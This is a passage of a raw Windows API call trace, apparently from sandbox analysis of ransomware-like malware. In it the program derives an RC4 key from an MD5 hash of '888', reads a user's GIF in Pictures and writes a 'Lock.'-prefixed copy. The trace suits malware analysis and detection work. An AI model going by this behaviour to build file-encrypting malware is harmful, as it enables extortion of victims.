wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.582] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.582] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.582] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.582] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.582] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.582] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.582] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0211.582] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.582] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0211.582] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.582] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.582] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0211.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab2d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0211.582] CryptCreateHash (in: hProv=0xa7c2a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0211.582] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.582] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.582] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.582] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0211.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d28, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0211.583] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0211.583] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0211.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71cc8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0211.583] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.583] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.583] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.583] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.583] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.583] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.583] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0211.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab2f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0211.583] CryptHashData (hHash=0x9e1ab8, pbData=0x2a71cb8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0211.583] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.583] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.583] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.583] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.583] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.583] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.583] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.584] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.584] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0211.584] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.584] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0211.584] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.584] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.584] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab188, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0211.584] CryptDeriveKey (in: hProv=0xa7c2a8, Algid=0x6601, hBaseData=0x9e1ab8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2078) returned 1 [0211.584] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.584] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.584] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.584] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.584] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.584] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.584] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.584] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0211.584] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.584] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0211.584] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0211.584] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0211.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f70a0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0211.585] CryptDestroyHash (hHash=0x9e1ab8) returned 1 [0211.585] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.585] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.585] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.585] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.585] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.585] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/ul6W7nkKmk8Vcoms6H.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\ul6w7nkkmk8vcoms6h.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f4 [0211.586] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.586] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0211.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f20 [0211.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0211.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0211.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0211.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0211.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0211.587] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0211.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0211.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0211.587] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0211.587] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0211.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0211.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0211.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0211.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0211.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0211.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0211.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0211.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0211.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0211.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0211.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0211.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0211.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a739f8 [0211.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0211.588] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0211.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a739f8 | out: hHeap=0x2af0000) returned 1 [0211.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0211.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a930 [0211.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0211.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0211.590] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.ul6W7nkKmk8Vcoms6H.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.ul6w7nkkmk8vcoms6h.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0211.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7160 [0211.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0211.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0211.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0211.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.591] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0211.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0211.591] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0211.591] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0211.591] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0211.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0211.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0211.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0211.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0211.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0211.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0211.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0211.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0211.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0211.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0211.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0211.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0211.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0211.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0211.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0211.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0211.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0211.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50ea020 [0211.595] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0211.595] ReadFile (in: hFile=0x4f4, lpBuffer=0x3854008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3854008*, lpNumberOfBytesRead=0x8cf4f8*=0x3e21, lpOverlapped=0x0) returned 1 [0211.597] ReadFile (in: hFile=0x4f4, lpBuffer=0x3854008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3854008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0211.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0211.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0211.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0211.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3e21) returned 0x3864010 [0211.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50ea020 | out: hHeap=0x2af0000) returned 1 [0211.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.600] HeapFree (in: 